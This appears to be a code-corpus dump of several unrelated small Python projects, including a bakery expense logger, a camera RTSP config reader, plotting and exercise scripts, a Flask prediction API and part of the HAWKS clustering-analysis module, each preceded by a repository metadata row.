    logger.ch = logging.StreamHandler()
    logger.ch.setLevel(CONSOLE_LOG_LEVEL)
    logger.formatter = logging.Formatter('%(message)s') # simpler display format
    logger.ch.setFormatter(logger.formatter)
    logger.addHandler(logger.ch)
if __name__ == '__main__':
    # =================================================================================
    # In APPLICATION CODE, use whichever of the following is appropriate:
    # NOTE(review): add_handling() has not been called here, so these
    # messages have no handlers and myBackup.log may not exist yet --
    # the open() below would then raise FileNotFoundError.  Confirm.
    logger.debug('debug message ' + time.ctime() )
    logger.info('info message ' + time.ctime() )
    # logger.warn('warn message')
    # logger.error('error message')
    # logger.critical('critical message')
    # =================================================================================
    # Test Logger: dump the logfile back to stdout.
    f = open("myBackup.log")
    s = f.read()
print(s)
| true |
9658becc733e65c824a16eed27fe95fef48159bd | Python | gill104/AlvaradoExpences | /DemoAlvarado.py | UTF-8 | 7,621 | 2.859375 | 3 | [] | no_license | '''
*Created by: Gilbert Salazar
*Description: To provide a log for all expences and sales for 'Alvarado's Bakery'
*
*Implement Dictionary properly to load and save data.
*create a class for menuVendor/MenuStart/MenuEnd
*Fix errors due to moving expence instance to proper location
*deal with memory issue (delete the instance made)
*general cleanup of definition
*
'''
import sys
import os
import time
import pickle
#import GUI as gui
#simple class that stores user information into a list format
class ExpenceStorage:
    # One expense record for the bakery log.  All field access goes through
    # the __Data list (index order: invoice, date, vendor, product, pay
    # method, pay amount, notes); the individual __InvoiceNumber etc.
    # attributes only seed the list and are never read afterwards.
    def __init__(self):
        self.__InvoiceNumber = 'N/A'
        self.__Date = 'N/A'
        self.__Vendor = 'N/A'
        self.__Product = 'N/A'
        self.__PayMethod = 'N/A'
        self.__Notes = 'N/A'
        self.__PayAmount = 0.0
        #self.name = ''
        #self.value = 0.0
        #might not need this list
        self.__Data = [
            self.__InvoiceNumber,
            self.__Date,
            self.__Vendor,
            self.__Product,
            self.__PayMethod,
            self.__PayAmount,
            self.__Notes
            ]
    def setInvoiceNumber(self, invoiceNum):
        self.__Data[0] = invoiceNum
    def setDate(self, date):
        self.__Data[1] = date
    def setVendor(self, vendor):
        self.__Data[2] = vendor
    def setProduct(self, product):
        self.__Data[3] = product
    def setPayMethod(self, method):
        self.__Data[4] = method
    def setPayAmount(self, amount):
        self.__Data[5] = amount
    def setNotes(self, notes):
        self.__Data[6] = notes
    def getInvoiceNumber(self):
        return self.__Data[0]
    def getDate(self):
        return self.__Data[1]
    def getVendor(self):
        return self.__Data[2]
    def getProduct(self):
        return self.__Data[3]
    def getPayMethod(self):
        return self.__Data[4]
    def getPayAmount(self):
        return self.__Data[5]
    def getNotes(self):
        return self.__Data[6]
    #saves user information into an external file
    def saveToFile(self, fileName):
        # Appends the record twice: newline-separated to *fileName* and
        # tab-separated to usrFile.txt, then clears the terminal.
        # NOTE(review): string concatenation raises TypeError if any field
        # is still non-string (PayAmount starts as the float 0.0) -- the
        # caller presumably sets all fields to strings first; confirm.
        file = open(fileName,'a+')
        file.write(
            self.__Data[0] + '\n' +
            self.__Data[1] + '\n' +
            self.__Data[2] + '\n' +
            self.__Data[3] + '\n' +
            self.__Data[4] + '\n' +
            self.__Data[5] + '\n' +
            self.__Data[6] + '\n')
        file.close()
        print('Data Saved...press [any button to continue]')
        file = open('usrFile.txt','a+')
        file.write(
            self.__Data[0] + '\t' +
            self.__Data[1] + '\t' +
            self.__Data[2] + '\t' +
            self.__Data[3] + '\t' +
            self.__Data[4] + '\t' +
            self.__Data[5] + '\t' +
            self.__Data[6] + '\n')
        file.close()
        #input()
        os.system('clear')
        #with open('data.pickle','wb') as f:
        #    pickle.dump(self.__Data,f,pickle.HIGHEST_PROTOCOL)
    def getData(self):
        # Returns the raw field list (also printed for debugging).
        print(self.__Data)
        return self.__Data
    def printList(self):
        # Debug helper: print the current record, then replay every object
        # pickled into data.pickle until EOF.
        print(self.__Data)
        with open('data.pickle', 'rb') as f:
            while(True):
                try:
                    self.readData = pickle.load(f)
                    print('Read Data: ' , self.readData)
                except EOFError:
                    break
'''class SalesInformation():
def __init__(self):
self.__Total = 0.0
self.__CardTotal = 0.0
self.__CashTotal = 0.0
self.__EbtTotal = 0.0
def setTotal(self, total):
self.__Total = total
def setCardTotal(self, cardTotal):
self.__CardTotal = cardTotal
def setCashTotal(self, cashTotal):
self.__CashTotal = cashTotal
def setEbtTotal(self, ebtTotal):
self.__EbtTotal = ebtTotal
def getTotal(self):
return self.__Total
def getCardTotal(self):
return self.__CardTotal
def getCashTotal(self):
return self.__CashTotal
def getEbtTotal(self):
return self.__EbtTotal
def saveToFile(self, fileName):
file = open(fileName, 'a+')
file.write(
self.__Total + '\n' +
self.__CardTotal + '\n' +
self.__CashTotal + '\n' +
self.__EbtTotal + '\n'
)
file.close()
print('Data saved...press [Any button to continue]')
input()
os.system('clear')
'''
class MenuVariableHolder():
    """Holds the menu filter selections (vendor, start/end date, pay type).

    Unset values are represented by the 'N/A' placeholder; an empty-string
    date passed to a setter also falls back to 'N/A'.
    """
    def __init__(self):
        self.__vendor = 'N/A'
        self.__start_date = 'N/A'
        self.__end_date = 'N/A'
        self.__pay_type = 'N/A'
    def setMenuVendor(self, menuVendor):
        self.__vendor = menuVendor
    def setMenuStartDate(self,menuStartDate):
        # Empty string means "no date chosen" -> keep the placeholder.
        self.__start_date = menuStartDate if menuStartDate != '' else 'N/A'
    def setMenuEndDate(self, menuEndDate):
        self.__end_date = menuEndDate if menuEndDate != '' else 'N/A'
    def setMenuPayType(self, menuPayType):
        self.__pay_type = menuPayType
    def getMenuVendor(self):
        return self.__vendor
    def getMenuStartDate(self):
        return self.__start_date
    def getMenuEndDate(self):
        return self.__end_date
    def getMenuPayType(self):
        return self.__pay_type
class DictionaryHash():
    # Maps a key (vendor name) to a list of expense records, with pickle
    # persistence in 'Diction.data.pickle'.  The __l attribute is never
    # used.  The print() calls throughout are debug output.
    def __init__(self):
        self.__d = {}
        self.__l = []
    def setDictionary(self, key, value):
        # Append *value* under *key*, creating the list on first use.
        # (Both branches end up doing the same append; the else branch's
        # setdefault is redundant since the key already exists there.)
        print('key: ', key)
        print('Value: ', value, '\n')
        if(key not in self.__d.keys()):
            self.__d[key] = []
            self.__d[key].append(value)
            '''self.__d = {}
            self.__d[key] = []
            print('created new empty List for ', key, '\n')
            print('should be empty: ', self.__d)
            self.__d[key].append(value)
            print('newItem Added: ' , self.__d, '\n')'''
        else:
            self.__d.setdefault(key, [])
            self.__d[key].append(value)
    def getDictionary(self):
        return self.__d
    def saveDictionary(self):
        # Overwrite the pickle file with the current dictionary.
        with open('Diction.data.pickle','wb') as f:
            print('Im saving this: ' , self.__d)
            pickle.dump(self.__d,f,pickle.HIGHEST_PROTOCOL)
    def loadDictionary(self):
        # Load the persisted dictionary; if the file is missing, create an
        # empty one so the next load/save succeeds.
        try:
            with open('Diction.data.pickle', 'rb') as f:
                #while(True):
                try:
                    self.__d = pickle.load(f)
                    print('Reading Dictionary')
                    for k,v in self.__d.items():
                        print('k: ', k)
                        print('v: ', v)
                except EOFError:
                    print('blaj')
        except FileNotFoundError:
            file = open('Diction.data.pickle','a+')
            file.close()
    def selectVendor(self):
        # Return ['N/A'] followed by every known vendor key.
        vendorList = ['N/A']
        for k,v in self.__d.items():
            print("Keys: ", k)
            vendorList.append(k)
        return vendorList
def loadMemory():
    """Recreate application state: load the persisted expense dictionary
    from disk and pair it with a fresh menu-selection holder."""
    d = DictionaryHash()
    d.loadDictionary()
    mvh = MenuVariableHolder()
return(d,mvh) | true |
e4f3f070b029bcad3d3108c1fb2103506da255c0 | Python | Tr33-He11/HIK_FaceDetec_DL_System | /Configuration/config.py | UTF-8 | 1,108 | 2.515625 | 3 | [] | no_license | # coding=utf-8
import configparser
import os
# rootdir = os.getcwd() # get the absolute path of the config file
# rootconf = os.path.join(rootdir, 'config.ini') # join the path with the file name
# print(rootconf)
# Earlier mistake: config.ini must live in the project root directory.
# NOTE(review): the absolute path below is machine-specific; consider
# resolving config.ini relative to this file instead.
config = configparser.ConfigParser()
config.read('/home/douxiao/Desktop/HIK_FaceDetec_DL_System/config.ini') # read the settings from the config file
user = config.get("accountConf", "user")
password = config.get("accountConf", "password")
host = config.get("ipConf", "host")
port = config.get("ipConf", "port")
def get_rtsp():
    # RTSP address of the Hikvision camera.
    # Hikvision cameras use RTSP (Real Time Streaming Protocol),
    # an application protocol for controlling streaming-media servers.
    rtsp = "rtsp://%s:%s@%s/Streaming/Channels/1" % (user, password, host)
    print(rtsp)
    return rtsp
def get_ip():
    # Camera host/IP from the config file.
    return host
def get_port():
    # Camera port (string, as read from the config file).
    return port
if __name__ == "__main__":
    get_rtsp()
    get_ip()
get_port() | true |
e07c3b3b6fb00b5521ed3f996ee0f386b2a67644 | Python | aleksda/FYS4150 | /Project3/script/plot_exp.py | UTF-8 | 825 | 3.515625 | 4 | [] | no_license | # Importing pandas for data analysis, numpy for numerical computations
# matplotlib and seaborn for data visualization
import pandas as pd, numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import os # To change directory
# NOTE(review): hardcoded, machine-specific working directory.
os.chdir('/home/aleksandar/Desktop/FYS4150/Project3/')
# Making the plot nicer
sns.set() # Dont' have seaborn? Remove everything with sns. from the code
sns.color_palette("husl", 8)
plt.style.use("bmh")
# The wave function
def func_to_plot(x):
    """Wave function psi(r) = exp(-alpha * |r|) with alpha = 2."""
    alpha = 2
    return np.exp(-alpha * np.abs(x))
# Grid points
r = np.linspace(-5,5, 1001)
# Plotting: save the figure in both formats to the plots/ subdirectory
# (which must already exist), then display it.
plt.plot(r, func_to_plot(r), 'purple', label='$\\psi(r)$')
plt.title('Wave Function')
plt.legend(loc='best')
plt.xlabel('$r$')
plt.ylabel('$\\psi(r) = e^{-\\alpha |r|}$')
plt.savefig('plots/wave_func.jpg')
plt.savefig('plots/wave_func.png')
plt.show()
| true |
68877ed3bfe99bad9024029233d30c3d0191a25f | Python | lucasvanmeter/connect4 | /Player.py | UTF-8 | 592 | 3.75 | 4 | [] | no_license | #!/usr/bin/python3
#We want a generic class of players to play the game. We will implement both a human and bot to play.
class Player:
    # Abstract base: concrete players must override play().
    def __init__(self):
        pass
    #should return key for where to play
    def play(self,board):
        raise Exception('Unimplemented')
#Human players will be asked to make a move when it is their turn to play.
class Human(Player):
    def getInput(self):
        # Prompt on stdin until the user types a valid integer.
        # NOTE(review): retries by recursing, so an extremely long run of
        # invalid input could hit the recursion limit; a loop would be safer.
        try:
            return int(input('Where do you want to play? ---> '))
        except ValueError:
            print("I didn't catch that, try again:")
            return self.getInput()
    def play(self,board):
        # The board argument is ignored; the human reads the screen.
return self.getInput()
| true |
604f8c368f91a70d6a563ba3a855dae29285b038 | Python | Stepankazak/repo-for-writes | /work6.py | UTF-8 | 276 | 3.234375 | 3 | [] | no_license | a = int(input('Введите нач. км: '))
# Athlete grows the daily distance `a` by 10% per day until it reaches
# the target `b`; `day` counts the day the target is achieved.
b = int(input('Введите конец км:'))
day = 1
while b - a > 0:
    a = a + (a * 0.1)  # +10% each day
    day += 1
print(f'На { day }-й день спортсмен достиг результата-не менее { b }км')
| true |
1d8b5c689efedce687b27308345edd63d74cdf22 | Python | arashmostafaee/rollercoaster | /server.py | UTF-8 | 3,960 | 3.140625 | 3 | [] | no_license | #!/usr/bin/env python
import socket as sk
import json
import time
HOST = '10.22.8.155'
PORT = 12345
WAGON_SIZE = 1
s = sk.socket(sk.AF_INET, sk.SOCK_DGRAM)
s.bind((HOST, PORT))
passengerQueue = []
wagonQueue = []
def addPassenger(address): # add an IP + port to our passenger queue
    # Enqueue the client and acknowledge over the module-level UDP socket.
    passengerQueue.append(address)
    s.sendto("You entered the passenger queue".encode(), address)
    print("Added the user to the passenger queue, we have ", str(len(passengerQueue)), " passengers in queue")
def addWagon(address): # add an ip + port to our wagon queue
    # Enqueue the wagon client and acknowledge over the UDP socket.
    wagonQueue.append(address)
    s.sendto("You entered the wagon queue".encode(), address)
    print("Added the user to the wagon queue, we have ", str(len(wagonQueue)), " wagons in queue")
def checkAvailableRide(): # check if we have a wagon and enough passengers for it, send away the wagon with the passengers
    # If a wagon and WAGON_SIZE passengers are queued: tell each passenger
    # the wagon's IP over UDP, then send the wagon the full passenger IP
    # list as JSON over a fresh TCP connection to port 1337.
    # do we have a wagon and enough people for it?
    print("Checking if there is a wagon and enough passengers for it")
    if ((len(passengerQueue) >= WAGON_SIZE) and (len(wagonQueue) >= 1)):
        currentWagon = wagonQueue.pop(0) # pop wagon from queue
        currentWagon = currentWagon[0] # retrieve ip from tuple
        tcp_socket_wagon = sk.socket(sk.AF_INET, sk.SOCK_STREAM)
        tcp_socket_wagon.connect((currentWagon, 1337)) # open TCP connection with wagon
        print("Found enough passengers and a wagon, now messaging the passengers and the wagon")
        # while True:
        #     tcp_socket_wagon.send(('I am sending your passengers now, are you ready?').encode())
        #     tcp_response_msg = tcp_socket_wagon.recv(50)
        #     print("waiting to see if wagon is ready")
        #     if tcp_response_msg.decode() == "I am ready to receive passengers":
        #         print("Wagon is ready to receive the passengers, starting to send them.")
        #         time.sleep(1)
        #         break
        passengerListForWagon = []
        for i in range(WAGON_SIZE): # tell each passenger the wagon ip, and tell wagon each passenger ip
            currentPassenger = passengerQueue.pop(0) # pop passenger from queue
            # x=currentPassenger
            currentPassengerIP = currentPassenger[0] # retrieve ip from tuple
            passengerListForWagon.append(currentPassengerIP)
            # tcp_socket_wagon.send(('This is the ip of a passenger,'+str(currentPassenger)).encode())
            s.sendto(('This is the ip of your wagon,' + str(currentWagon)).encode(), currentPassenger)
            print("Passenger number ", str(i + 1), " is now informed.")
        jsonData = json.dumps(passengerListForWagon)
        tcp_socket_wagon.send((jsonData).encode())
        print("The wagon is now informed about all passengers.")
        tcp_socket_wagon.close()
        print("The ride is now planned!")
    else:
        print("There is currently not enough passengers or wagons in queue..")
def sendAnotherPassenger(address):
    # A wagon lost a passenger: pop a replacement and send its IP to the
    # wagon over UDP.
    # NOTE(review): raises IndexError when the passenger queue is empty.
    newPassenger = passengerQueue.pop(0) # pop first passenger in queue
    s.sendto(newPassenger[0].encode(), address)
    print("Sent a new passenger to wagon with disconnected passenger.")
def handleClientMessage(msg, address):
    # Dispatch on the exact message text; unknown messages are ignored.
    # if-else statement to handle the message received
    if (msg == "I want to join passenger queue"):
        addPassenger(address)
    elif (msg == "I want to join wagon queue"):
        addWagon(address)
    elif (msg == "I need one more passenger"):
        sendAnotherPassenger(address)
print("Server started!")
# Main UDP loop: receive a datagram, dispatch it, then try to schedule a ride.
while 1:
    payload, client_address = s.recvfrom(65536)
    # data = json.loads(payload.decode())
    print("Received payload: " + payload.decode())
    print("Handling the message..")
    handleClientMessage(payload.decode(), client_address) # Handle the message received accordingly
    checkAvailableRide() # check the queues if we can send wagon with passenger
print("")
| true |
0121950dd94d2681322997ca71758a02a6cf866e | Python | wchh-2000/Parking_data_analysis | /get_data.py | UTF-8 | 4,024 | 3.53125 | 4 | [] | no_license | import pandas as pd
def time2dig(t):
    """Convert 'YYYY-MM-DD HH:MM:SS' to a fractional hour (e.g. 23.117).

    Seconds >= 30 round the minute up, so the result is minute-accurate.
    """
    clock = t[11:]  # drop the date part
    hour, minute, second = (int(part) for part in clock.split(':'))
    if second >= 30:
        minute += 1  # round up to the nearest minute
    return hour + minute / 60
import re
def len2dig(t):
    """Convert a duration like '0天2小时19分51秒' to fractional hours (e.g. 2.33).

    Seconds >= 30 round the minute up, so the result is minute-accurate.
    """
    # Split on the CJK unit characters, then keep the numeric tokens.
    tokens = re.split('[天 小时 分 秒]', t.strip())
    day, hour, minute, second = [int(tok) for tok in tokens if tok != '']
    if second >= 30:
        minute += 1  # round up to the nearest minute
    return day * 24 + hour + minute / 60
def num2week(n):
    """Map a day offset from a known Sunday to the Chinese weekday name.

    n % 7 == 0 is Sunday, 1 is Monday, ... 6 is Saturday.
    """
    names = ('星期日', '星期一', '星期二', '星期三', '星期四', '星期五', '星期六')
    return names[n % 7]
import os
def get_data():
    # Load every parking-log Excel file from ./data/, clean it, derive the
    # time features used by the analysis (dates, fractional-hour times,
    # weekday names), and return one concatenated DataFrame.
    fnames = os.listdir('./data/')# relative path: list every file in the data folder
    dfall=pd.DataFrame()# start with an empty dataframe
    for fname in fnames:
        df=pd.read_excel('./data/'+fname,skiprows=3)# skip the first three rows, read from row 4
        delid=[0,1,3,4,5,6,7,9,18,19,20]+list(range(11,17))+list(range(22,29))# column indices to drop
        df.drop(df.columns[delid], axis=1, inplace=True)# axis=1 drops columns; inplace mutates df
        df.dropna(inplace=True)# drop any row containing missing data
        # Rename the Chinese column headers to short English names.
        df.rename(columns={'车牌号码':'num','服务套餐':'type','入场时间':'intime',\
                           '出场时间':'outtime','停车时长':'length'}, inplace = True)
        df['type']=df['type'].replace(['纯车牌月卡A','临时车纯车牌识别(小车)'],['业主','临时'])
        df['indatetime']=pd.to_datetime(df['intime'])# entry date+time as datetime64
        df['outdatetime']=pd.to_datetime(df['outtime'])# exit date+time as datetime64
        delid=df.loc[df['indatetime']<pd.to_datetime('2018-09-01'),:].index
        df=df.drop(delid)# drop rows whose parking started before Sept 1 (whole row, so indate too)
        # outdatetime needs no trimming: the Excel data is already sorted by exit time.
        df['indate']=list(map(lambda s:s[0:10],df['intime']))# first ten chars = the date part
        df['indate']=pd.to_datetime(df['indate'])# datetime64 for easier handling
        df['intimedig']=list(map(time2dig,df['intime']))# continuous numeric time (float64)
        df['intime']=list(map(lambda s:s[11:],df['intime']))# chars from index 11 on = time of day
        df['intime']=pd.to_datetime(df['intime'])# convert to datetime64
        df['outdate']=list(map(lambda s:s[0:10],df['outtime']))
        df['outdate']=pd.to_datetime(df['outdate'])
        df['outtimedig']=list(map(time2dig,df['outtime']))
        df['outtime']=list(map(lambda s:s[11:],df['outtime']))# chars from index 11 on = time of day
        df['outtime']=pd.to_datetime(df['outtime'])# convert to datetime64
        dfall=pd.concat([dfall,df],ignore_index=True)# vertical concat, reindexed
    interval=dfall['indate']-pd.to_datetime('2018-09-02')# 2018-09-02 was a Sunday
    # Gap from that Sunday: a Series whose elements are Timedelta objects.
    interval=[i.days for i in interval]# .days gives the whole-day count
    # Convert each gap to an integer, building a plain list.
    dfall['inweek']=pd.Series([num2week(i) for i in interval])
    # Map to weekday names as a new 'inweek' column (a plain list would also work).
    # 'outweek' is computed the same way below.
    interval=dfall['outdate']-pd.to_datetime('2018-09-02')
    interval=[i.days for i in interval]
    dfall['outweek']=pd.Series([num2week(i) for i in interval])
    #print(dfall.head(10))
    return dfall
df=get_data()
| true |
5d908654a6a275b51e44758c9f718912d864b730 | Python | yohira0616/python-til | /hello_tkinter.py | UTF-8 | 158 | 3.171875 | 3 | [] | no_license | import tkinter as tk
# Minimal Tkinter demo: a 640x480 window titled "Hello,tkinter!" that shows
# a single "Hello,World" label.
root=tk.Tk()
root.title("Hello,tkinter!")
root.geometry("640x480")
label = tk.Label(text="Hello,World")
label.pack()
root.mainloop()  # blocks until the window is closed
| true |
dce758adce284fd4e2cededad11a78fc18080e36 | Python | DomenOslaj/Hidden-number | /hidden-number.py | UTF-8 | 571 | 3.9375 | 4 | [] | no_license | import random
def main():
    """Play one round of a number-guessing game on stdin/stdout.

    Picks a secret integer in [1, 30] and loops until the user guesses it,
    hinting "bigger"/"smaller" after each wrong guess.
    """
    secret = random.randint(1, 30)
    while True:
        # BUG FIX: the original called Python 2's `raw_input`, which raises
        # NameError on Python 3; `input` is the Python 3 equivalent.
        guess = input("Which number do i have in mind? :) ")
        guess = int(guess)  # non-numeric input raises ValueError (unchanged behaviour)
        if guess == secret:
            print ("Congratulations, that is the right number!")
            break
        elif guess > secret:
            print ("Nope, try something smaller! :)")
        elif guess < secret:
            print ("Nope, try something bigger! :)")
if __name__ == "__main__": # run the game only when executed as a script, not when imported
    main()
33cd184335afff7624c43d28c3d8cae4162856d4 | Python | rokastr/Introduction-to-Object-oriented-Programming | /oblig3/sirkel.py | UTF-8 | 225 | 3.15625 | 3 | [] | no_license | #Et program tegner en rød sirkel.
from ezgraphics import GraphicsWindow
# Draw a single circle in a 400x200 ezgraphics window.
win = GraphicsWindow(400,200)
c = win.canvas()
c.setOutline("red")
c.setFill(255, 0, 100)  # NOTE(review): RGB(255,0,100) is pink, not red — confirm intent
c.setColor("red")  # presumably overrides the earlier outline/fill; verify against ezgraphics docs
c.drawOval(45, 45, 90, 90)  # bounding box (x, y, width, height) -> 90px circle
win.wait()  # keep the window open until the user closes it
| true |
453776f23efcd7a2f38f5027eebde4682218a248 | Python | Techainer/pyScanLib | /exampleUsage.py | UTF-8 | 1,093 | 2.9375 | 3 | [
"BSD-2-Clause"
] | permissive | from pyScanLib import pyScanLib
#======================================================================
# Name: saneLib
# Location: https://github.com/soachishti/pyScanLib
# License: BSD 2-Clause License
#======================================================================
# Example usage: scan one page with the first available scanner and save it
# as a JPEG.
ls = pyScanLib()
# BUG FIX: the original called getScanners() on the class
# (pyScanLib.getScanners()), which fails without an instance; call it on
# the `ls` instance instead.
scanners = ls.getScanners()
print(scanners)  # parenthesized print: valid on both Python 2 and 3
ls.setScanner(scanners[0])
# Below statement must be run after setScanner()
ls.setDPI(300)
print(ls.getScannerSize()) # (left,top,width,height)
# Set Area in Pixels
# width = ls.pixelToInch(128)
# height = ls.pixelToInch(128)
# ls.setScanArea(width=width,height=height) # (left,top,width,height)
# Set Area in centimeter
# width = ls.cmToInch(10)
# height = ls.cmToInch(10)
# ls.setScanArea(width=width,height=height) # (left,top,width,height)
# A4 Example
ls.setScanArea(width=8.26,height=11.693) # (left,top,width,height) in Inches
ls.setPixelType("color") # bw/gray/color
pil = ls.scan()  # returns a PIL image
pil.show()
pil.save("scannedImage.jpg")
ls.closeScanner() # unselect the scanner selected in setScanner()
ls.close() # destroy the whole class / release the backend
78b019df137857af1f774df7555e95f4b1ae43ab | Python | AnthonyTurgelis/python-challenge | /PyBank/main.py | UTF-8 | 1,614 | 3.140625 | 3 | [] | no_license | import os
import csv
import pandas as pd
import numpy as np
import itertools as it
# PyBank: summarise ../pybank/budget_data.csv (columns: month, profit) and
# write a small summary CSV.
csvpath = os.path.join('..', 'pybank', 'budget_data.csv')
months = []
profit = []
maxi = []
mini = []
# First pass: collect every month label and its integer profit value.
with open(csvpath, newline='') as csvfile:
    csvreader = csv.reader(csvfile, delimiter=",")
    next(csvfile)
    for row in csvreader:
        months.append(row[0])
        profit.append(int(row[1]))
print("Total Months:", int(len(months)))
totalprofit = sum(profit)
print("Total: $",int(totalprofit))
absolute = np.absolute(profit, out = None)
totalabsolute = sum(absolute)
# NOTE(review): this is the mean *absolute profit*, not the mean
# month-over-month change the label suggests — confirm intent.
avgchange = totalabsolute / int(len(months))
print("Average Change: $", avgchange)
# NOTE(review): `max`/`min` below shadow the Python builtins of the same name.
max = np.amax(profit)
# Second pass: re-read the file to find the row holding the maximum profit.
# The `>= max - 1` tolerance effectively matches the exact maximum for ints.
with open(csvpath, newline='') as csvfile:
    csvreader = csv.reader(csvfile, delimiter=",")
    next(csvfile)
    for row in csvreader:
        if float(row[1]) >= (max - 1):
            print("Greatest increase in profits:", row[0], "$",row[1])
            maxi = [row[0],row[1]]
min = np.amin(profit)
# Third pass: same scan for the minimum-profit row.
with open(csvpath, newline='') as csvfile:
    csvreader = csv.reader(csvfile, delimiter=",")
    next(csvfile)
    for row in csvreader:
        if float(row[1]) <= (min + 1):
            print("Greatest decrease in profits:", row[0], "$",row[1])
            mini = [row[0],row[1]]
# NOTE(review): maxi/mini are 2-element [month, value] lists, so this zip
# yields two rows of (count, total, maxi[i], mini[i]) — verify this is the
# intended output shape.
cleaned_csv = zip(it.repeat(len(months)),it.repeat(float(totalprofit)),maxi,mini)
# Set variable for output file
output_file = os.path.join("budget_final.csv")
# Open the output file
with open(output_file, "w", newline="") as datafile:
    writer = csv.writer(datafile)
    # Write the header row
    writer.writerow(["Months","Total","Max Increease","Max Decrease"])
    # Write in zipped rows
    writer.writerows(cleaned_csv)
| true |
18d63f77cc20d3bad8a2da0bb56b52e86e42e159 | Python | EHB-MCT/web3-prototypes-sarahverbelen | /ai-api-prototype/pythonapi.py | UTF-8 | 476 | 2.671875 | 3 | [] | no_license | import flask
from flask import request
from joblib import dump, load
# Load the serialized model pipeline with joblib.
# NOTE(review): requires model.joblib next to this script — confirm deployment layout.
pipeline = load('model.joblib')
app = flask.Flask(__name__)
app.config["DEBUG"] = True  # development setting; disable in production
@app.route('/', methods=['GET'])
def home():
    """Landing page: a short (Dutch) HTML description of the API."""
    landing_markup = "<h1>Python AI API</h1><p>Deze api geeft 'pos' of 'neg' terug als antwoord op een nederlandstalige tekst.</p>"
    return landing_markup
@app.route('/getResult', methods=['POST'])
def getResult():
    """Classify the posted JSON's 'text' field and return the predicted label."""
    posted_text = request.json['text']
    predictions = pipeline.predict([posted_text])
    return predictions[0]
app.run()
| true |
58c508b8b8a9f6a4935555649c91148fb0f7511c | Python | ricardomachorro/PracticasPropias | /PythonEnsayo/Python6.py | UTF-8 | 791 | 3.859375 | 4 | [] | no_license | #Otro tipo de dato que existe en python y que sirve mucho para bucles
#(continued from the header) another data type in Python that is very useful
#for loops is `range`: an ordered collection of numbers that constructs
#like `for` can iterate over.
#It is created with the reserved word `range`:
#with a single argument, that argument is taken as the (exclusive) upper bound
rang1 = range(6)
for i in rang1:
    print(i)
print("//////////////////////")
#with two arguments, the first is the (inclusive) lower bound and the last the (exclusive) upper bound
rang2 = range(2,5)
for i in rang2:
    print(i)
print("//////////////////////")
#with three arguments, the first is the lower bound, the second the upper bound,
#and the last is the step taken between consecutive numbers
rang3 = range(3,19,3)
for i in rang3:
    print(i)
print("///////////////////////")
| true |
afaaac2a984e4346249fa03509774dc3b675508a | Python | sea-shunned/hawks | /hawks/analysis.py | UTF-8 | 16,974 | 2.625 | 3 | [
"MIT"
] | permissive | """Defines the clustering algorithms and handles running them. Primarily used for analysis and instance space generation.
"""
from collections import defaultdict
from pathlib import Path
from itertools import zip_longest
import warnings
import inspect
import numpy as np
import pandas as pd
import sklearn.cluster
import sklearn.mixture
from sklearn.metrics import adjusted_rand_score
from scipy.spatial.distance import pdist, squareform
import hawks.utils
import hawks.problem_features
# Silence sklearn's FutureWarning chatter (e.g. default-parameter change notices).
warnings.filterwarnings(
    action='ignore', category=FutureWarning, module="sklearn"
)
def define_cluster_algs(seed):
    """Build the default suite of clustering algorithms.

    Four simple algorithms are used (average-linkage, GMM, K-Means++ and
    single-linkage), plus "(2K)" variants of the linkage methods that are
    given twice the true number of clusters.

    Args:
        seed (int): Random seed passed to the stochastic algorithms (GMM and
            K-Means++). ``int`` is generally fine, but depends on the
            algorithm implementation.

    Returns:
        dict: Maps each algorithm name to a dict with a ``"class"`` callable
        to create (and fit) the model, the ``"kwargs"`` it needs, and a
        ``"k_multiplier"`` (``None`` means use the true number of clusters).

    .. todo::
        Extend functionality for arbitrary clustering algorithms
    """
    def _spec(alg_class, kwargs, multiplier=None):
        # One row of the algorithm table; each call gets its own kwargs dict
        # so later per-dataset mutation (e.g. seed bumping) stays isolated.
        return {
            "class": alg_class,
            "kwargs": kwargs,
            "k_multiplier": multiplier,
        }

    agglomerative = getattr(sklearn.cluster, "AgglomerativeClustering")
    return {
        "Average-Linkage": _spec(
            agglomerative, {"linkage": "average", "n_clusters": None}
        ),
        "Average-Linkage (2K)": _spec(
            agglomerative, {"linkage": "average", "n_clusters": None}, 2.0
        ),
        "GMM": _spec(
            getattr(sklearn.mixture, "GaussianMixture"),
            {"n_components": None, "random_state": seed, "n_init": 3}
        ),
        "K-Means++": _spec(
            getattr(sklearn.cluster, "KMeans"),
            {"n_clusters": None, "random_state": seed, "n_init": 10}
        ),
        "Single-Linkage": _spec(
            agglomerative, {"linkage": "single", "n_clusters": None}
        ),
        "Single-Linkage (2K)": _spec(
            agglomerative, {"linkage": "single", "n_clusters": None}, 2.0
        ),
    }
def extract_datasets(generator=None, datasets=None, label_sets=None):
    """Resolve the datasets, label sets and config numbers to analyse.

    A supplied generator takes precedence: its best datasets (and the config
    id behind each one) are used.  Otherwise the explicitly passed
    ``datasets``/``label_sets`` are used with ``None`` config numbers.

    Raises:
        ValueError: If neither a generator nor datasets are given, or if the
            number of datasets and label sets differ.
    """
    if generator is None and datasets is None:
        raise ValueError(f"No generator or datasets have been given - there's nothing to evaluate!")
    if generator is None:
        # External datasets: there is no generator config to link back to.
        config_nums = [None for _ in datasets]
    else:
        datasets, label_sets, configs = generator.get_best_dataset(return_config=True)
        # One config id per dataset: each config was run `num_runs` times.
        runs_per_config = generator.full_config["hawks"]["num_runs"]
        config_nums = np.arange(len(configs)).repeat(runs_per_config).tolist()
    if len(datasets) != len(label_sets):
        raise ValueError("The number of datasets is not equal to the number of labels")
    return datasets, label_sets, config_nums
def setup_folder(save_folder, generator):
    """Decide where results should be written.

    Priority: an explicit ``save_folder``, then the generator's own
    ``base_folder``, and finally a dated ``clustering_*`` folder in the
    current working directory.
    """
    if save_folder is not None:
        return Path(save_folder)
    if generator is not None and generator.base_folder is not None:
        return generator.base_folder
    # Last resort: a folder named after today's date, in the cwd.
    return Path.cwd() / f"clustering_{hawks.utils.get_date()}"
def analyse_datasets(generator=None, datasets=None, label_sets=None, cluster_subset=None, feature_subset=None, seed=None, source="HAWKS", prev_df=None, clustering=True, feature_space=True, save=True, save_folder=None, filename="dataset_analysis"):
    """Function to analyze the datasets, either by their :py:mod:`~hawks.problem_features`, clustering algorithm performance, or both.

    Args:
        generator (:class:`~hawks.generator.BaseGenerator`, optional): HAWKS generator instance (that contains datasets). Defaults to None.
        datasets (list, optional): A list of the datasets to be examined. Defaults to None.
        label_sets (list, optional): A list of labels that match the list of datasets. Defaults to None.
